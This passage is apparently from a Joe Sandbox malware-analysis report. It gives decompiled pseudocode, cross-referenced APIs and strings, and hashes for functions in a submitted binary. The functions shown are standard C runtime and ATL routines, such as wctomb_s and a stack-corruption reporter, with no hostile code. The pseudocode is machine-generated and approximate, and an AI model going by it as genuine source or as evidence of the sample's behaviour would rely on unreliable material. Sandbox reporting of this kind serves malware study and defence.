                      					_t54 = E00941CA0(_t77, _a12);
                      					_t110 = _t107 + 0x10;
                      					_v2072 = _t54;
                      					__eflags = _v2072;
                      					if(__eflags == 0) {
                      						_t47 = E00941490(__eflags,  &_v2060, 0x400, L"%u - ", _a12);
                      						_t107 = _t110 + 0x10;
                      						_v2068 = _t47;
                      						__eflags = _v2068 - 0xffffffff;
                      						if(_v2068 != 0xffffffff) {
                      							L10:
                      							_t56 = E00995A70(_a20);
                      							_t107 = _t107 + 4;
                      							_t22 = _v2068 + 1; // 0x1
                      							_t95 = _t56 + _t22;
                      							_v2076 = _t95;
                      							E0094F150( &_v2084);
                      							__eflags = E0094F0C0( &_v2084, _t95, __eflags, _v2076) & 0x000000ff;
                      							if(__eflags != 0) {
                      								 *((short*)(E0094F180( &_v2084))) = 0;
                      								_push(_a20);
                      								_t95 = _v2076;
                      								_t63 = E00941490(__eflags, E0094F180( &_v2084), _t95, L"%ls%ls",  &_v2060);
                      								_t107 = _t107 + 0x14;
                      								__eflags = _t63 - 0xffffffff;
                      								if(__eflags != 0) {
                      									E0095AF80(_t103,  &_v2612, 0, 0x208);
                      									_t95 =  &_v2612;
                      									_t66 = E00941490(__eflags, _t95, 0x104, L"%hs", _a4);
                      									_t107 = _t107 + 0x1c;
                      									__eflags = _t66 - 0xffffffff;
                      									if(__eflags != 0) {
                      										L00994930(__eflags, 0,  &_v2612, _a8, 0, "%ls", E0094F180( &_v2084));
                      										_t107 = _t107 + 0x18;
                      										_t47 = E009422D0( &_v2084, __eflags);
                      									} else {
                      										_t47 = E009422D0( &_v2084, __eflags);
                      									}
                      								} else {
                      									_t47 = E009422D0( &_v2084, __eflags);
                      								}
                      							} else {
                      								_t47 = E009422D0( &_v2084, __eflags);
                      							}
                      							goto L17;
                      						}
                      						goto L17;
                      					}
                      					_t95 =  &_v2060;
                      					_t47 = E00941490(__eflags, _t95, 0x400, L"%ls - ", _v2072);
                      					_t107 = _t110 + 0x10;
                      					_v2068 = _t47;
                      					__eflags = _v2068 - 0xffffffff;
                      					if(_v2068 != 0xffffffff) {
                      						goto L10;
                      					} else {
                      						goto L17;
                      					}
                      				}
                      				goto L3;
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Module$CheckStackVars@8
                      • String ID: %hs$%ls$%ls - $%ls%ls$%u -
                      • API String ID: 3912913270-3378233065
                      • Opcode ID: 56d5712ebe91563c41c59fad75e4e7c09e5ba66df88677a222bdbff4c52a733e
                      • Instruction ID: 39d7e09f8fc898965e97a3c2a41835f11368bba5bc3de517700f8e58124d5fe0
                      • Opcode Fuzzy Hash: 56d5712ebe91563c41c59fad75e4e7c09e5ba66df88677a222bdbff4c52a733e
                      • Instruction Fuzzy Hash: 3551B1B5910208AACB14EB24DC52FEA73B8BF84314F4086A9F956571D2EE706BC5CFD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00967390(intOrPtr _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				char _v28;
                      				intOrPtr _v32;
                      				char _v36;
                      				signed int _v40;
                      				char _v44;
                      				signed int _v48;
                      				char _v52;
                      				signed int _v56;
                      				char _v60;
                      				char* _t46;
                      				intOrPtr _t50;
                      				char* _t51;
                      				char _t60;
                      				char _t64;
                      				signed int _t68;
                      				char _t69;
                      				char _t71;
                      				intOrPtr _t77;
                      				char* _t94;
                      				intOrPtr _t96;
                      				intOrPtr _t98;
                      				intOrPtr _t99;
                      				signed int _t104;
                      				void* _t105;
                      				void* _t106;
                      
                      				_t46 =  *0xb30640; // 0x0
                      				if( *_t46 == 0) {
                      					L20:
                      					E0095F3F0(_a4);
                      					return _a4;
                      				}
                      				_t94 =  *0xb30640; // 0x0
                      				if( *_t94 != 0x5f) {
                      					goto L20;
                      				}
                      				_t77 =  *0xb30640; // 0x0
                      				if( *((char*)(_t77 + 1)) == 0) {
                      					goto L20;
                      				}
                      				_t50 =  *0xb30640; // 0x0
                      				if( *((char*)(_t50 + 1)) > 0x44) {
                      					goto L20;
                      				}
                      				_t96 =  *0xb30640; // 0x0
                      				 *0xb30640 = _t96 + 1;
                      				_t51 =  *0xb30640; // 0x0
                      				_v20 =  *_t51 - 0x41;
                      				_t98 =  *0xb30640; // 0x0
                      				_t99 = _t98 + 1;
                      				 *0xb30640 = _t99;
                      				_v8 = _v20;
                      				if(_v8 > 3) {
                      					E0095F350(_a4, 2);
                      					return _a4;
                      				}
                      				E0095F3F0( &_v28);
                      				if(E00962230( &_v28) == 0) {
                      					L18:
                      					E0095F240(_a4,  &_v28);
                      					return _a4;
                      				}
                      				E0095FDE0( &_v28, 0x20);
                      				_t60 = E00960130( &_v28, 0xf);
                      				_t106 = _t105 + 4;
                      				_v36 = _t60;
                      				_v32 = _t99;
                      				E0095FCA0( &_v28,  &_v36);
                      				while(_v8 != 0) {
                      					_t104 =  !_v8 + 0x00000001 & _v8;
                      					_v16 = _t104;
                      					_v12 = _v16;
                      					if(_v12 == 1) {
                      						_t64 = E00960060("cpu", 3);
                      						_t106 = _t106 + 8;
                      						_v44 = _t64;
                      						_v40 = _t104;
                      						E0095FCA0( &_v28,  &_v44);
                      						L14:
                      						_t68 =  !_v16 & _v8;
                      						_v8 = _t68;
                      						if(_t68 != 0) {
                      							_t69 = E00960060(", ", 2);
                      							_t106 = _t106 + 8;
                      							_v60 = _t69;
                      							_v56 = _t104;
                      							E0095FCA0( &_v28,  &_v60);
                      						}
                      						continue;
                      					}
                      					if(_v12 == 2) {
                      						_t71 = E00960060("amp", 3);
                      						_t106 = _t106 + 8;
                      						_v52 = _t71;
                      						_v48 = _t104;
                      						_t104 =  &_v52;
                      						E0095FCA0( &_v28, _t104);
                      						goto L14;
                      					}
                      					E0095F350(_a4, 2);
                      					return _a4;
                      				}
                      				E0095FDE0( &_v28, 0x29);
                      				goto L18;
                      			}

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0096741B
                      • UnDecorator::doMSKeywords.LIBCMTD ref: 00967420
                      • DName::operator+=.LIBCMTD ref: 00967432
                        • Part of subcall function 0095FDE0: DName::isValid.LIBCMTD ref: 0095FDEC
                        • Part of subcall function 0095FDE0: DName::isEmpty.LIBCMTD ref: 0095FE00
                        • Part of subcall function 00960130: UnDecorator::doUnderScore.LIBCMTD ref: 00960136
                        • Part of subcall function 0095FCA0: DName::isValid.LIBCMTD ref: 0095FCAC
                        • Part of subcall function 0095FCA0: DName::isEmpty.LIBCMTD ref: 0095FCC1
                      • DName::DName.LIBVCRUNTIMED ref: 009674CA
                        • Part of subcall function 0095FCA0: DName::append.LIBCMTD ref: 0095FD24
                      • DName::operator+=.LIBCMTD ref: 0096750C
                      • Mailbox.LIBCMTD ref: 00967518
                      • DName::DName.LIBVCRUNTIMED ref: 00967529
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00967538
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name::is$Decorator::doEmptyIterator_baseIterator_base::_NameName::Name::operator+=Validstd::_$KeywordsMailboxName::appendScoreUnder
                      • String ID: amp$cpu
                      • API String ID: 4042095736-2542064945
                      • Opcode ID: 84fc07e958aad58cabc46e1f040b9147033017aa547fdade7b0a88a7ccdf20c4
                      • Instruction ID: 076c7d39e1cc6221537b1294e0ec24b30685e53c97fe3e892f1e5274d8a95b8f
                      • Opcode Fuzzy Hash: 84fc07e958aad58cabc46e1f040b9147033017aa547fdade7b0a88a7ccdf20c4
                      • Instruction Fuzzy Hash: B851A770D54108DBDB04EFE4D8A6BEDBBB1BF84345F1480A9F9066B295DB30AA45CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00947C00(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				intOrPtr _v8;
                      				signed int _v12;
                      				char _v20;
                      				char _v32;
                      				char _v40;
                      				char _v44;
                      				char _v48;
                      				void* _t43;
                      				intOrPtr _t44;
                      				void* _t46;
                      				void* _t49;
                      				void* _t59;
                      				void* _t73;
                      				signed int _t100;
                      				void* _t105;
                      				void* _t106;
                      				void* _t107;
                      				void* _t108;
                      				void* _t109;
                      				void* _t110;
                      
                      				_t107 = __esi;
                      				_t100 = __edx;
                      				_t73 = __ebx;
                      				_t105 =  &_v48;
                      				memset(_t105, 0xcccccccc, 0xb << 2);
                      				_t110 = _t109 + 0xc;
                      				_t106 = _t105 + 0xb;
                      				if(_a8 == 0) {
                      					L2:
                      					_t43 = L00994930(_t114, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0xe3, 0, "%ls", L"lpszKey != 0 && lpszItem != 0");
                      					_t110 = _t110 + 0x18;
                      					if(_t43 == 1) {
                      						asm("int3");
                      					}
                      					L4:
                      					if(_a8 == 0 || _a12 == 0) {
                      						_t44 = 0x80070057;
                      					} else {
                      						_v8 = 0x8007000e;
                      						E00942AF0(_a4 + 0x10);
                      						_t49 = E00992E00(_a8);
                      						_t110 = _t110 + 4;
                      						_v12 = _t49 + 1;
                      						E0094EC30( &_v20);
                      						_t100 = _v12;
                      						__eflags = E0094EB10(_t73,  &_v20, _t106, _t107, _t100) & 0x000000ff;
                      						if(__eflags != 0) {
                      							E009426F0(_t73, _t106, _t107, __eflags, E0094EBF0( &_v20), _v12, _a8);
                      							_t59 = E00992E00(_a12);
                      							_t110 = _t110 + 0x10;
                      							_v12 = _t59 + 1;
                      							E0094EC30( &_v32);
                      							_t100 = E0094EB10(_t73,  &_v32, _t106, _t107, _v12) & 0x000000ff;
                      							__eflags = _t100;
                      							if(__eflags != 0) {
                      								E009426F0(_t73, _t106, _t107, __eflags, E0094EBF0( &_v32), _v12, _a12);
                      								_t110 = _t110 + 0xc;
                      								_v40 = E0094EBF0( &_v32);
                      								_v44 = E0094EBF0( &_v20);
                      								_t100 =  &_v40;
                      								__eflags = E0094E340(_a4 + 4,  &_v44, _t100);
                      								if(__eflags != 0) {
                      									_v8 = 0;
                      									E0094EAE0( &_v20);
                      									E0094EAE0( &_v32);
                      								}
                      							}
                      							E0094EC00( &_v32, __eflags);
                      						}
                      						__eflags = _a4 + 0x10;
                      						E00942B00(_a4 + 0x10);
                      						_v48 = _v8;
                      						E0094EC00( &_v20, __eflags);
                      						_t44 = _v48;
                      					}
                      					_push(_t100);
                      					E009D14C0(_t108, 0x947d8c);
                      					_t46 = _t44;
                      					return E009D1520(_t46, _t108 - _t110 + 0x2c);
                      				}
                      				_t114 = _a12;
                      				if(_a12 != 0) {
                      					goto L4;
                      				}
                      				goto L2;
                      			}

                      APIs
                      Strings
                      • lpszKey != 0 && lpszItem != 0, xrefs: 00947C22
                      • %ls, xrefs: 00947C27
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00947C33
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Module__crt_unique_heap_ptr_strlen$CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$lpszKey != 0 && lpszItem != 0
                      • API String ID: 4051287597-3321575645
                      • Opcode ID: 5d7653607b0b8321a483d25c2d8b5935a523689305011a0e4a989567130515c4
                      • Instruction ID: a0d1d702d94a518fd339643bb920c79323732257ad5383ab703e63ad3425af35
                      • Opcode Fuzzy Hash: 5d7653607b0b8321a483d25c2d8b5935a523689305011a0e4a989567130515c4
                      • Instruction Fuzzy Hash: D2412172D00209ABCF14EFD4D892FEEB375BF94304F148929F5166B292DB359A44CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 46%
                      			E009D15E0(void* __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				signed int _v8;
                      				char _v28;
                      				char _v80;
                      				char _v324;
                      				intOrPtr _v328;
                      				void* __ebx;
                      				void* __edi;
                      				signed int _t18;
                      				signed int _t30;
                      				intOrPtr _t36;
                      				void* _t42;
                      				intOrPtr _t43;
                      				void* _t45;
                      				signed int _t46;
                      
                      				_t44 = __esi;
                      				_t37 = __ecx;
                      				_t18 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t18 ^ _t46;
                      				_t20 = _a4;
                      				_t36 = _a8;
                      				_t43 =  *0xb2f3e8; // 0x1
                      				_v328 = _a4;
                      				if(_t43 == 0xffffffff) {
                      					L4:
                      					__eflags = _v8 ^ _t46;
                      					return E00957280(_t20, _t36, _v8 ^ _t46, _t42, _t43, _t44);
                      				} else {
                      					if(_t36 != 0) {
                      						_push(__esi);
                      						_t7 = _t36 + 0x20; // 0x21
                      						_t45 = _t7;
                      						E009D17D0(__ecx,  &_v28,  &_v80, _t45,  *((intOrPtr*)(_t36 + 0xc)) - 0x24);
                      						_push("\n");
                      						_push( &_v80);
                      						_push("> ");
                      						_push( &_v28);
                      						_push("\nData: <");
                      						_push(_a12);
                      						_t30 =  *((intOrPtr*)(_t36 + 0xc)) - 0x24;
                      						__eflags = _t30;
                      						_push("\nAllocation number within this function: ");
                      						_push(_t30);
                      						_push("\nSize: ");
                      						_push(_t45);
                      						_push("\nAddress: 0x");
                      						E00954240(_t30,  &_v324, 0xf4, "%s%s%p%s%zd%s%d%s%s%s%s%s", "Stack area around _alloca memory reserved by this function is corrupted");
                      						_t20 = E009D1860(_t37, _t42, _v328, _t43, 4,  &_v324);
                      						_pop(_t44);
                      						goto L4;
                      					} else {
                      						return E00957280(E009D1860(__ecx, _t42, _t20, _t43, 4, "Stack area around _alloca memory reserved by this function is corrupted\n"), _t36, _v8 ^ _t46, _t42, _t43, __esi);
                      					}
                      				}
                      			}

                      APIs
                      • failwithmessage.LIBCMTD ref: 009D161D
                        • Part of subcall function 009D1860: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 009D18C1
                        • Part of subcall function 009D1860: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000000), ref: 009D18E0
                        • Part of subcall function 009D1860: DebuggerProbe.LIBCMTD ref: 009D18FA
                        • Part of subcall function 009D1860: DebuggerRuntime.LIBCMTD ref: 009D1916
                        • Part of subcall function 009D1860: IsDebuggerPresent.KERNEL32 ref: 009D193F
                      • _getMemBlockDataString.LIBCMTD ref: 009D1649
                      • failwithmessage.LIBCMTD ref: 009D16AD
                      Strings
                      • Stack area around _alloca memory reserved by this function is corrupted, xrefs: 009D167F
                      • %s%s%p%s%zd%s%d%s%s%s%s%s, xrefs: 009D1684
                      • Allocation number within this function: , xrefs: 009D166E
                      • Stack area around _alloca memory reserved by this function is corrupted, xrefs: 009D1614
                      • Data: <, xrefs: 009D1663
                      • Address: 0x, xrefs: 009D167A
                      • Size: , xrefs: 009D1674
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Debugger$ByteCharMultiWidefailwithmessage$BlockDataPresentProbeRuntimeString_get
                      • String ID: Address: 0x$Allocation number within this function: $Data: <$Size: $%s%s%p%s%zd%s%d%s%s%s%s%s$Stack area around _alloca memory reserved by this function is corrupted$Stack area around _alloca memory reserved by this function is corrupted
                      • API String ID: 4067135985-3301296223
                      • Opcode ID: 39c9963b9af4956579eed2f1f764b095982dfd3b2ea21f8ad75f3ff4a76a1e6e
                      • Instruction ID: c8c033cb84af2c85d9fa03e38e79b1282f971eb761fed1a6ff6be3110f05e432
                      • Opcode Fuzzy Hash: 39c9963b9af4956579eed2f1f764b095982dfd3b2ea21f8ad75f3ff4a76a1e6e
                      • Instruction Fuzzy Hash: 45218372A4020CBBCB10DED5EC86FEE777CEB48714F044556FA19A71C1DA70A95587A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E009A5AF0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, char* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				char _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				char _v76;
                      				char _v80;
                      				char _v96;
                      				intOrPtr _t102;
                      				long _t106;
                      				void* _t111;
                      				void* _t125;
                      				void* _t142;
                      				void* _t145;
                      				intOrPtr _t167;
                      				void* _t179;
                      				void* _t180;
                      				void* _t181;
                      				void* _t182;
                      
                      				_t180 = __esi;
                      				_t179 = __edi;
                      				_t145 = __ebx;
                      				if(_a8 == 0 && _a12 > 0) {
                      					if(_a4 != 0) {
                      						 *_a4 = 0;
                      					}
                      					return 0;
                      				}
                      				__eflags = _a4;
                      				if(_a4 != 0) {
                      					_t146 = _a4;
                      					 *_a4 = 0xffffffff;
                      				}
                      				__eflags = _a12 - 0x7fffffff;
                      				if(_a12 > 0x7fffffff) {
                      					_v12 = 0;
                      				} else {
                      					_v12 = 1;
                      				}
                      				_v16 = _v12;
                      				__eflags = _v16;
                      				if(__eflags == 0) {
                      					_t142 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x34, 0, L"%ls", L"destination_count <= INT_MAX");
                      					_t181 = _t181 + 0x18;
                      					__eflags = _t142 - 1;
                      					if(_t142 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				__eflags = _v16;
                      				if(_v16 != 0) {
                      					L00976CC0(_t145,  &_v96, _t180, _a20);
                      					_t167 =  *((intOrPtr*)(E00977A60( &_v96)));
                      					__eflags =  *((intOrPtr*)(_t167 + 8)) - 0xfde9;
                      					if( *((intOrPtr*)(_t167 + 8)) != 0xfde9) {
                      						_t151 =  *((intOrPtr*)(E00977A60( &_v96)));
                      						__eflags =  *((intOrPtr*)(_t151 + 0xbadc4d));
                      						if( *((intOrPtr*)(_t151 + 0xbadc4d)) != 0) {
                      							_v32 = 0;
                      							_t154 =  *((intOrPtr*)( *((intOrPtr*)(E00977A60( &_v96))) + 8));
                      							_t102 = E009B0A90( *((intOrPtr*)( *((intOrPtr*)(E00977A60( &_v96))) + 8)), 0,  &_a16, 1, _a8, _a12, 0,  &_v32);
                      							_t182 = _t181 + 0x20;
                      							_v8 = _t102;
                      							__eflags = _v8;
                      							if(_v8 == 0) {
                      								L42:
                      								__eflags = _v8;
                      								if(_v8 != 0) {
                      									L55:
                      									 *((intOrPtr*)(L00992F70(_t154))) = 0x2a;
                      									_v68 = 0x2a;
                      									E00977230( &_v96);
                      									return _v68;
                      								}
                      								_t106 = GetLastError();
                      								__eflags = _t106 - 0x7a;
                      								if(_t106 != 0x7a) {
                      									goto L55;
                      								}
                      								__eflags = _a8;
                      								if(_a8 != 0) {
                      									__eflags = _a12;
                      									if(_a12 > 0) {
                      										E0095AF80(_t179, _a8, 0, _a12);
                      										_t182 = _t182 + 0xc;
                      									}
                      								}
                      								_t154 = 0;
                      								__eflags = 0;
                      								if(0 == 0) {
                      									_v36 = 0;
                      								} else {
                      									_v36 = 1;
                      								}
                      								_v40 = _v36;
                      								__eflags = _v40;
                      								if(__eflags == 0) {
                      									_t111 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x83, 0, L"%ls", L"(\"Buffer too small\", 0)");
                      									_t182 = _t182 + 0x18;
                      									__eflags = _t111 - 1;
                      									if(_t111 == 1) {
                      										asm("int3");
                      									}
                      								}
                      								__eflags = _v40;
                      								if(_v40 != 0) {
                      									goto L55;
                      								} else {
                      									 *((intOrPtr*)(L00992F70(_t154))) = 0x22;
                      									E00992900(L"(\"Buffer too small\", 0)", L"_wctomb_s_l", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x83, 0);
                      									_v64 = 0x22;
                      									E00977230( &_v96);
                      									return _v64;
                      								}
                      							}
                      							__eflags = _v32;
                      							if(_v32 == 0) {
                      								__eflags = _a4;
                      								if(_a4 != 0) {
                      									 *_a4 = _v8;
                      								}
                      								_v72 = 0;
                      								E00977230( &_v96);
                      								return _v72;
                      							}
                      							goto L42;
                      						}
                      						__eflags = (_a16 & 0x0000ffff) - 0xff;
                      						if((_a16 & 0x0000ffff) <= 0xff) {
                      							__eflags = _a8;
                      							if(_a8 == 0) {
                      								L37:
                      								__eflags = _a4;
                      								if(_a4 != 0) {
                      									 *_a4 = 1;
                      								}
                      								_v60 = 0;
                      								E00977230( &_v96);
                      								return _v60;
                      							}
                      							__eflags = _a12;
                      							if(_a12 <= 0) {
                      								_v24 = 0;
                      							} else {
                      								_v24 = 1;
                      							}
                      							_v28 = _v24;
                      							__eflags = _v28;
                      							if(__eflags == 0) {
                      								_t125 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x60, 0, L"%ls", L"destination_count > 0");
                      								_t181 = _t181 + 0x18;
                      								__eflags = _t125 - 1;
                      								if(_t125 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							__eflags = _v28;
                      							if(_v28 != 0) {
                      								 *_a8 = _a16;
                      								goto L37;
                      							} else {
                      								 *((intOrPtr*)(L00992F70(_t151))) = 0x22;
                      								E00992900(L"destination_count > 0", L"_wctomb_s_l", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x60, 0);
                      								_v56 = 0x22;
                      								E00977230( &_v96);
                      								return _v56;
                      							}
                      						}
                      						__eflags = _a8;
                      						if(_a8 != 0) {
                      							__eflags = _a12;
                      							if(_a12 > 0) {
                      								_t151 = _a12;
                      								E0095AF80(_t179, _a8, 0, _a12);
                      							}
                      						}
                      						 *((intOrPtr*)(L00992F70(_t151))) = 0x2a;
                      						_v52 = 0x2a;
                      						E00977230( &_v96);
                      						return _v52;
                      					}
                      					_v80 = 0;
                      					_v76 = 0;
                      					_t163 =  &_v80;
                      					_v20 = E009B9E00(_a8, _a16 & 0x0000ffff,  &_v80);
                      					__eflags = _a4;
                      					if(_a4 != 0) {
                      						_t163 = _a4;
                      						 *_a4 = _v20;
                      					}
                      					__eflags = _v20 - 4;
                      					if(_v20 > 4) {
                      						_v48 =  *((intOrPtr*)(L00992F70(_t163)));
                      						E00977230( &_v96);
                      						return _v48;
                      					} else {
                      						_v44 = 0;
                      						E00977230( &_v96);
                      						return _v44;
                      					}
                      				} else {
                      					 *((intOrPtr*)(L00992F70(_t146))) = 0x16;
                      					E00992900(L"destination_count <= INT_MAX", L"_wctomb_s_l", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x34, 0);
                      					return 0x16;
                      				}
                      			}



































                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: "$"$%ls$("Buffer too small", 0)$*$*$_wctomb_s_l$destination_count <= INT_MAX$destination_count > 0$minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp
                      • API String ID: 0-2198373435
                      • Opcode ID: a0fa4cb149edeaa24ec89e42842e4948cf9dca5972b661cf1cca62b6ab416b84
                      • Instruction ID: 90766fa96a00a8628042bd6860d84fb40a68b06e78ec8e261c32ba10ef1f1b58
                      • Opcode Fuzzy Hash: a0fa4cb149edeaa24ec89e42842e4948cf9dca5972b661cf1cca62b6ab416b84
                      • Instruction Fuzzy Hash: AFB16C70A40608EFDF24EF90D846BEE77B8AF85319F218018F5156A2D1D7B45E85CBE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E009BA060(void* __ecx, char* _a4, char _a8, char _a12, char _a16) {
                      				char _v5;
                      				char* _v12;
                      				char* _v16;
                      				char _v20;
                      				intOrPtr _v24;
                      				char _v28;
                      				char _v32;
                      				char _v36;
                      				char _v40;
                      				char _v44;
                      				char _v48;
                      				char _v52;
                      				void* _t82;
                      				char _t89;
                      				char _t91;
                      				void* _t99;
                      				void* _t103;
                      				void* _t107;
                      				void* _t111;
                      				void* _t112;
                      				char _t136;
                      				void* _t149;
                      
                      				_t112 = __ecx;
                      				if(_a4 == 0) {
                      					_v20 = 0;
                      				} else {
                      					_v20 = 1;
                      				}
                      				_v24 = _v20;
                      				_t157 = _v24;
                      				if(_v24 == 0) {
                      					_t111 = L00994930(_t157, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1d, 0, L"%ls", L"buffer != nullptr");
